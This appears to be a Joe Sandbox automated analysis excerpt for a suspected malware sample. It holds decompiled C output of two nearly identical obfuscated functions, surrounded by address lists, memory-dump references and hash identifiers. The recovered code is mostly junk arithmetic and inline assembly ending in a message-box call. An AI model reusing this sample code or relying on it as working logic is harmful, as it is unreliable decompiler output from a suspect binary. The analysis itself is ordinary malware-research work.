                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7880

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RPSQ8~
                                              • API String ID: 0-3092587937
                                              • Opcode ID: 2de88b3cd0afa0ffeb9f5a4dd4e0edce20a591c055bc5890cbf34affb82238d7
                                              • Instruction ID: 361a195aab7dcbe397bcbbe4d82a4673e4020e3b791bc131f98a82e45229265f
                                              • Opcode Fuzzy Hash: 2de88b3cd0afa0ffeb9f5a4dd4e0edce20a591c055bc5890cbf34affb82238d7
                                              • Instruction Fuzzy Hash: 9EE1D1709042598ECB29DF68D591FFEBBB2EB58340F14906EE489E734DDB3A4942CB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC6D7C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 212COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E00EC6D7C(void* __eax, void* __ebx, void* __ecx, void* __edi, signed int __esi, void* __fp0) {
				intOrPtr _t84;
				signed int _t90;
				intOrPtr _t91;
				signed int _t92;
				signed int _t94;
				signed int _t97;
				signed char _t98;
				void* _t100;
				void* _t103;
				void* _t109;
				WCHAR* _t112;
				signed char _t119;
				signed short _t127;
				signed int _t139;
				signed int _t148;
				signed int _t149;
				signed int _t151;
				signed int _t153;
				signed int _t168;
				signed int _t170;
				signed int _t175;
				signed int _t176;
				signed int _t182;
				signed int _t193;
				WCHAR* _t194;
				signed int _t202;
				signed int _t203;
				signed int _t213;
				signed int _t215;
				signed int _t220;
				signed int _t222;
				signed int _t223;
				void* _t225;
				void* _t229;

				_t222 = __esi;
				_t139 = __ebx - 1;
				asm("adc edi, [eax+ebp*8]");
				asm("in al, 0x56");
				asm("cdq");
				if(__eflags < 0) {
					L10:
					asm("enter 0xfa1b, 0x8b");
					_push(_t225);
					 *(_t139 - 0x35dc73bb) = _t170;
					 *(_t225 - 0x78) = _t170;
					 *(_t225 - 0x74) = _t220 & _t90;
					 *(_t225 - 0xa) = ( *(_t225 - 0xa) & 0x000000ff) + ( *(_t225 - 0x18) & 0x0000ffff);
					_t91 =  *((intOrPtr*)(_t225 - 4));
					 *0x1000cf0 = _t139;
					_t175 = _t91 +  *0x1000cc8 + 1;
					__eflags = _t175;
					 *0x1000cd4 = _t175;
					 *0x1000cf4 = 0;
					goto L11;
				} else {
					_pop(es);
					if(__eflags > 0) {
						L11:
						_t92 = _t91 + 0x1000cf4;
						__eflags = _t92;
						 *_t175 =  *_t175 + _t92;
						 *_t92 =  *_t92 + _t92;
						 *_t92 =  *_t92 + _t92;
						__eflags =  *_t92;
						L13:
					} else {
						asm("movsb");
						_push(ds);
						_t26 = __ah;
						__ah = __bl;
						__bl = _t26;
						__ch -  *((intOrPtr*)(__esp + __ebx + 0x5610b0e7)) = __al & 0x000000a7;
						__fp0 = __fp0 +  *((intOrPtr*)(__edi + __ecx));
						_t32 = __ebx - 0x79000000;
						 *_t32 =  *(__ebx - 0x79000000) | 0x00000011;
						__eflags =  *_t32;
						 *__eax =  *__eax + __al;
						_t34 = __edi + 0x4cd25c11;
						 *_t34 =  *(__edi + 0x4cd25c11) + __al;
						__eflags =  *_t34;
					}
				}
				 *(_t225 + _t222 * 2 - 0x160) = ( *(_t225 + _t222 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
				_t222 = _t222 + 1;
				if(_t222 < 6) {
					_t176 =  *((intOrPtr*)(_t225 - 0xb));
					_t229 =  *0x1000c9b - _t176; // -28
					if(_t229 >= 0) {
						if( *((intOrPtr*)(_t225 - 1)) == 0) {
							_t84 =  *((intOrPtr*)(_t225 - 0x6c));
							_t215 =  *(_t225 - 0x34);
							asm("cdq");
							__eflags = _t84 -  *((intOrPtr*)(_t225 - 0x38));
							if(_t84 !=  *((intOrPtr*)(_t225 - 0x38))) {
								L6:
								 *(_t225 - 0x90) =  *((intOrPtr*)(_t225 - 0x40)) +  *0x1000d10 +  *0x1000c84 -  *((intOrPtr*)(_t225 - 1));
								 *(_t225 - 0x2c) =  *(_t225 - 0x2c) - ( *(_t225 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
								 *0x1000ca0 =  *0x1000ca0 +  *(_t225 - 0x7c);
								 *0x1000c9e =  *0x1215420;
								 *0x1000c88 =  *0x1000c88 -  *((intOrPtr*)(_t225 - 0x40));
								asm("sbb [0x1000c8c], eax");
							} else {
								__eflags = _t176 - _t215;
								if(_t176 == _t215) {
									_t168 =  *0x1000c88 |  *0x1000c8c;
									__eflags = _t168;
									 *_t168 =  *_t168 + _t84;
									__eflags =  *_t168;
									if( *_t168 != 0) {
										_t220 =  *(_t225 - 0x74);
										_t90 =  *0x1000c83 & 0x000000ff;
										asm("cdq");
										_t170 =  *(_t225 - 0x78) - _t90;
										__eflags = _t170;
										goto L10;
									}
								} else {
									goto L6;
								}
							}
						} else {
							_t148 =  *0x1000d04; // 0xffffffff
							asm("cdq");
							_t94 =  *0x1000d00; // 0xfffff835
							_t213 = _t176 & _t148;
							 *0x1000d00 = E00ECEE50( *(_t225 - 0x1c) & _t94, _t213, _t94, _t148);
							 *0x1000d04 = _t213;
						}
					}
					goto L13;
				}
				_t149 =  *0x1000d00; // 0xfffff835
				 *0x1000ce0 = 2;
				 *0x1000ce4 = 0;
				 *(_t225 - 0x70) = _t149 * 0x6eb594ba;
				_t151 =  *0x1000ce4; // 0x0
				 *0x110030c =  *(_t225 - 0x60);
				_t97 =  *0x1000ce0; // 0x0
				_t182 = _t97 | _t151;
				if(_t182 == 0) {
					 *((intOrPtr*)(_t225 - 0xbc)) = 0;
					__eflags =  *(_t225 - 6);
					if( *(_t225 - 6) != 0) {
						_t98 = 0;
						__eflags = 0;
					} else {
						_t98 = 1;
					}
					_t153 =  *0x1000d00 + _t98;
					__eflags = _t153;
					 *((short*)(_t225 - 0x24)) =  !_t153;
				} else {
					if(_t97 != 1 || _t151 != 0) {
						if(_t97 == 2 && _t151 == 0) {
							_t127 =  *0x1000cdc; // 0x84521e70
							 *(_t225 - 0x60) = ( *(_t225 - 0x68) ^ _t127 ^  *0x1000d00) * (_t127 + 0xffffbb58);
							_t202 =  *0x1000c94; // 0x0
							_t203 = _t202 * 0x2d40daef;
							 *(_t225 - 0x7c) =  *(_t225 - 0x7c) * ( *0x1000cec & 0x0000ffff);
							 *(_t225 - 0x90) = _t203;
							asm("cdq");
							 *((intOrPtr*)(_t225 - 0x38)) = ( *(_t225 - 0x84) & 0x0000ffff) + ( *(_t225 - 0x84) & 0x0000ffff) + ( *(_t225 - 0x84) & 0x0000ffff) + ( *(_t225 - 0x84) & 0x0000ffff) + ( *(_t225 - 0x84) & 0x0000ffff) + ( *(_t225 - 0x84) & 0x0000ffff) + ( *(_t225 - 0x84) & 0x0000ffff) + ( *(_t225 - 0x84) & 0x0000ffff);
							 *(_t225 - 0x34) = _t203;
						}
					} else {
						asm("cdq");
						 *0x1000cb8 =  *((intOrPtr*)(_t225 - 4)) - 0x4fef3c23;
						 *0x1000cbc = _t182;
						 *((intOrPtr*)(_t225 - 0x4c)) =  *0x1215420;
						 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
					}
				}
				 *((short*)(_t225 - 0x154)) =  ~(( *(_t225 - 0xc4) +  *((intOrPtr*)(_t225 - 0xa4))) *  *(_t225 - 0xc4) *  *(_t225 - 0x14) ^ 0x0000701c);
				_t100 = 0x20b;
				do {
					 *((char*)(_t225 - 0xb)) =  *((char*)(_t225 - 0xb)) + 1;
					_t100 = _t100 - 1;
				} while (_t100 > 0);
				_t103 = ( *(_t225 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
				 *0x1000c84 = 0;
				if(_t103 != 0) {
					_t223 = 0;
					__eflags = 0;
				} else {
					_t66 = _t103 + 1; // 0x20b
					_t223 = _t66;
				}
				asm("cdq");
				_t193 =  *(_t225 - 0x2c);
				asm("cdq");
				asm("adc edx, [0x1000cc4]");
				_t109 = E00ECEE50(( *(_t225 - 0x18) & 0x0000ffff) + ( *(_t225 - 0xc) & 0x000000ff) + 1,  *(_t225 - 0xc), _t193 +  *0x1000cc0, _t193);
				asm("sbb edx, edi");
				 *0x1000c83 = 1;
				if((_t109 - _t223 | _t193) != 0) {
					 *0x1000c83 = 0;
				}
				if( *0x1000c84 == 0) {
					 *((short*)(_t225 - 0x24)) = 0x83;
					asm("cdq");
					 *0x1000cc8 = ( *(_t225 - 0x18) & 0x0000ffff) + 0xf;
					_t119 =  *0x1000cd0; // 0x0
					 *0x1000ccc = _t193;
					 *((char*)(_t225 - 5)) =  *((intOrPtr*)(_t225 - 3)) +  *((intOrPtr*)(_t225 - 0x28)) + (_t119 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
					asm("cdq");
					 *((intOrPtr*)(_t225 - 0xa0)) =  *((intOrPtr*)(_t225 - 0xa0)) -  *0x1000cd0 - 0x3811;
					asm("sbb [ebp-0x9c], edx");
				}
				_t79 = _t225 - 0x160; // 0x60f1ba1c
				_t194 = _t79;
				_t80 = _t225 - 0x1ac; // 0x60f1b9d0
				_t112 = _t80;
				MessageBoxW(GetForegroundWindow(), _t112, _t194, 0x10);
				return 0;
			}





































                                              0x00ec6d7c
                                              0x00ec6d7c
                                              0x00ec6d7d
                                              0x00ec6d80
                                              0x00ec6d82
                                              0x00ec6d83
                                              0x00ec6d30
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00000000
                                              0x00ec6d85
                                              0x00ec6d85
                                              0x00ec6d86
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d77
                                              0x00ec6d88
                                              0x00ec6d88
                                              0x00ec6d89
                                              0x00ec6d8a
                                              0x00ec6d8a
                                              0x00ec6d8a
                                              0x00ec6d93
                                              0x00ec6d95
                                              0x00ec6d98
                                              0x00ec6d98
                                              0x00ec6d98
                                              0x00ec6d9a
                                              0x00ec6d9c
                                              0x00ec6d9c
                                              0x00ec6d9c
                                              0x00ec6d9c
                                              0x00ec6d86
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e69
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00000000
                                              0x00ec6d2f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00000000
                                              0x00ec6c69
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7880

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RPSQ8~
                                              • API String ID: 0-3092587937
                                              • Opcode ID: d85cefc71a0617212e82779e205098ec80b6a245a61ea022389f066d8277b0c1
                                              • Instruction ID: 84c1fa5c5d10160cc468f3fe4f774ffb9e648b136f5e9fceb38644d72b7a3731
                                              • Opcode Fuzzy Hash: d85cefc71a0617212e82779e205098ec80b6a245a61ea022389f066d8277b0c1
                                              • Instruction Fuzzy Hash: C78115719043998FCB26CF64D941BFEBBB2EB59300F1450AEE4C5E725AD63A4942CB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC6DD9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 190COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 81%
                                              			E00EC6DD9(signed int __eax, signed int __ebx, signed int __ecx, signed int __edi, signed int __esi, void* __eflags, void* __fp0) {
				signed int _t82;
				intOrPtr _t85;
				signed int _t92;
				signed int _t95;
				signed char _t96;
				void* _t98;
				void* _t101;
				void* _t107;
				WCHAR* _t110;
				signed char _t117;
				signed short _t125;
				signed int _t140;
				signed int _t150;
				signed int _t151;
				signed int _t153;
				signed int _t155;
				signed int _t170;
				signed int _t176;
				signed int _t184;
				signed int _t187;
				signed int _t198;
				WCHAR* _t199;
				signed int _t207;
				signed int _t208;
				signed int _t210;
				signed int _t212;
				signed int _t217;
				signed int _t218;
				void* _t220;

				_t217 = __esi;
				_t210 = __edi;
				_t140 = __ecx;
				_t137 = __ebx;
				_t81 = __eax;
				asm("sahf");
				asm("adc edi, [eax+ebp*8]");
				asm("in al, 0x56");
				asm("cdq");
				if(__eflags < 0) {
					L10:
					asm("enter 0xfa1b, 0x8b");
					_push(_t220);
					 *(_t137 - 0x35dc73bb) = _t140;
					 *(_t220 - 0x78) = _t140;
					 *(_t220 - 0x74) = _t210 & _t81;
					 *(_t220 - 0xa) = ( *(_t220 - 0xa) & 0x000000ff) + ( *(_t220 - 0x18) & 0x0000ffff);
					_t81 =  *((intOrPtr*)(_t220 - 4));
					 *0x1000cf0 = _t137;
					_t140 = _t81 +  *0x1000cc8 + 1;
					__eflags = _t140;
					 *0x1000cd4 = _t140;
					 *0x1000cf4 = 0;
					goto L11;
				} else {
					_pop(es);
					if(__eflags > 0) {
						L11:
						_t82 = _t81 + 0x1000cf4;
						__eflags = _t82;
						 *_t140 =  *_t140 + _t82;
						 *_t82 =  *_t82 + _t82;
						 *_t82 =  *_t82 + _t82;
						__eflags =  *_t82;
						L13:
					} else {
						asm("movsb");
						_push(ds);
						_t137 = __eax;
						 *(__eax - 0x79000000) =  *(__eax - 0x79000000) | 0x00000011;
						 *__ebx =  *__ebx + __ebx;
						 *((intOrPtr*)(__edi + 0x4cd25c11)) =  *((intOrPtr*)(__edi + 0x4cd25c11)) + __ebx;
					}
				}
				 *(_t220 + _t217 * 2 - 0x160) = ( *(_t220 + _t217 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
				_t217 = _t217 + 1;
				if(_t217 < 6) {
					_t176 =  *((intOrPtr*)(_t220 - 0xb));
					__eflags =  *0x1000c9b - _t176; // -28
					if(__eflags >= 0) {
						__eflags =  *(_t220 - 1);
						if( *(_t220 - 1) == 0) {
							_t85 =  *((intOrPtr*)(_t220 - 0x6c));
							_t212 =  *(_t220 - 0x34);
							asm("cdq");
							__eflags = _t85 -  *((intOrPtr*)(_t220 - 0x38));
							if(_t85 !=  *((intOrPtr*)(_t220 - 0x38))) {
								L6:
								 *(_t220 - 0x90) =  *((intOrPtr*)(_t220 - 0x40)) +  *0x1000d10 +  *0x1000c84 -  *(_t220 - 1);
								 *(_t220 - 0x2c) =  *(_t220 - 0x2c) - ( *(_t220 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
								 *0x1000ca0 =  *0x1000ca0 +  *(_t220 - 0x7c);
								 *0x1000c9e =  *0x1215420;
								 *0x1000c88 =  *0x1000c88 -  *((intOrPtr*)(_t220 - 0x40));
								asm("sbb [0x1000c8c], eax");
							} else {
								__eflags = _t176 - _t212;
								if(_t176 == _t212) {
									_t170 =  *0x1000c88 |  *0x1000c8c;
									__eflags = _t170;
									 *_t170 =  *_t170 + _t85;
									__eflags =  *_t170;
									if( *_t170 != 0) {
										_t210 =  *(_t220 - 0x74);
										_t81 =  *0x1000c83 & 0x000000ff;
										asm("cdq");
										_t140 =  *(_t220 - 0x78) - _t81;
										__eflags = _t140;
										goto L10;
									}
								} else {
									goto L6;
								}
							}
						} else {
							_t150 =  *0x1000d04; // 0xffffffff
							asm("cdq");
							_t92 =  *0x1000d00; // 0xfffff835
							_t184 = _t176 & _t150;
							 *0x1000d00 = E00ECEE50( *(_t220 - 0x1c) & _t92, _t184, _t92, _t150);
							 *0x1000d04 = _t184;
						}
					}
					goto L13;
				}
				_t151 =  *0x1000d00; // 0xfffff835
				 *0x1000ce0 = 2;
				 *0x1000ce4 = 0;
				 *(_t220 - 0x70) = _t151 * 0x6eb594ba;
				_t153 =  *0x1000ce4; // 0x0
				 *0x110030c =  *(_t220 - 0x60);
				_t95 =  *0x1000ce0; // 0x0
				_t187 = _t95 | _t153;
				if(_t187 == 0) {
					 *((intOrPtr*)(_t220 - 0xbc)) = 0;
					__eflags =  *(_t220 - 6);
					if( *(_t220 - 6) != 0) {
						_t96 = 0;
						__eflags = 0;
					} else {
						_t96 = 1;
					}
					_t155 =  *0x1000d00 + _t96;
					__eflags = _t155;
					 *((short*)(_t220 - 0x24)) =  !_t155;
				} else {
					if(_t95 != 1 || _t153 != 0) {
						if(_t95 == 2 && _t153 == 0) {
							_t125 =  *0x1000cdc; // 0x84521e70
							 *(_t220 - 0x60) = ( *(_t220 - 0x68) ^ _t125 ^  *0x1000d00) * (_t125 + 0xffffbb58);
							_t207 =  *0x1000c94; // 0x0
							_t208 = _t207 * 0x2d40daef;
							 *(_t220 - 0x7c) =  *(_t220 - 0x7c) * ( *0x1000cec & 0x0000ffff);
							 *(_t220 - 0x90) = _t208;
							asm("cdq");
							 *((intOrPtr*)(_t220 - 0x38)) = ( *(_t220 - 0x84) & 0x0000ffff) + ( *(_t220 - 0x84) & 0x0000ffff) + ( *(_t220 - 0x84) & 0x0000ffff) + ( *(_t220 - 0x84) & 0x0000ffff) + ( *(_t220 - 0x84) & 0x0000ffff) + ( *(_t220 - 0x84) & 0x0000ffff) + ( *(_t220 - 0x84) & 0x0000ffff) + ( *(_t220 - 0x84) & 0x0000ffff);
							 *(_t220 - 0x34) = _t208;
						}
					} else {
						asm("cdq");
						 *0x1000cb8 =  *((intOrPtr*)(_t220 - 4)) - 0x4fef3c23;
						 *0x1000cbc = _t187;
						 *((intOrPtr*)(_t220 - 0x4c)) =  *0x1215420;
						 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
					}
				}
				 *((short*)(_t220 - 0x154)) =  ~(( *(_t220 - 0xc4) +  *((intOrPtr*)(_t220 - 0xa4))) *  *(_t220 - 0xc4) *  *(_t220 - 0x14) ^ 0x0000701c);
				_t98 = 0x20b;
				do {
					 *((char*)(_t220 - 0xb)) =  *((char*)(_t220 - 0xb)) + 1;
					_t98 = _t98 - 1;
				} while (_t98 > 0);
				_t101 = ( *(_t220 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
				 *0x1000c84 = 0;
				if(_t101 != 0) {
					_t218 = 0;
					__eflags = 0;
				} else {
					_t66 = _t101 + 1; // 0x20b
					_t218 = _t66;
				}
				asm("cdq");
				_t198 =  *(_t220 - 0x2c);
				asm("cdq");
				asm("adc edx, [0x1000cc4]");
				_t107 = E00ECEE50(( *(_t220 - 0x18) & 0x0000ffff) + ( *(_t220 - 0xc) & 0x000000ff) + 1,  *(_t220 - 0xc), _t198 +  *0x1000cc0, _t198);
				asm("sbb edx, edi");
				 *0x1000c83 = 1;
				if((_t107 - _t218 | _t198) != 0) {
					 *0x1000c83 = 0;
				}
				if( *0x1000c84 == 0) {
					 *((short*)(_t220 - 0x24)) = 0x83;
					asm("cdq");
					 *0x1000cc8 = ( *(_t220 - 0x18) & 0x0000ffff) + 0xf;
					_t117 =  *0x1000cd0; // 0x0
					 *0x1000ccc = _t198;
					 *((char*)(_t220 - 5)) =  *((intOrPtr*)(_t220 - 3)) +  *((intOrPtr*)(_t220 - 0x28)) + (_t117 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
					asm("cdq");
					 *((intOrPtr*)(_t220 - 0xa0)) =  *((intOrPtr*)(_t220 - 0xa0)) -  *0x1000cd0 - 0x3811;
					asm("sbb [ebp-0x9c], edx");
				}
				_t79 = _t220 - 0x160; // 0x60f1ba1c
				_t199 = _t79;
				_t80 = _t220 - 0x1ac; // 0x60f1b9d0
				_t110 = _t80;
				MessageBoxW(GetForegroundWindow(), _t110, _t199, 0x10);
				return 0;
			}
































                                              0x00ec6dd9
                                              0x00ec6dd9
                                              0x00ec6dd9
                                              0x00ec6dd9
                                              0x00ec6dd9
                                              0x00ec6dd9
                                              0x00ec6d7d
                                              0x00ec6d80
                                              0x00ec6d82
                                              0x00ec6d83
                                              0x00ec6d30
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00000000
                                              0x00ec6d85
                                              0x00ec6d85
                                              0x00ec6d86
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d77
                                              0x00ec6d88
                                              0x00ec6d88
                                              0x00ec6d89
                                              0x00ec6d8a
                                              0x00ec6d98
                                              0x00ec6d9a
                                              0x00ec6d9c
                                              0x00ec6d9c
                                              0x00ec6d86
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e69
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c72
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00000000
                                              0x00ec6d2f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00000000
                                              0x00ec6c69
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7880

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
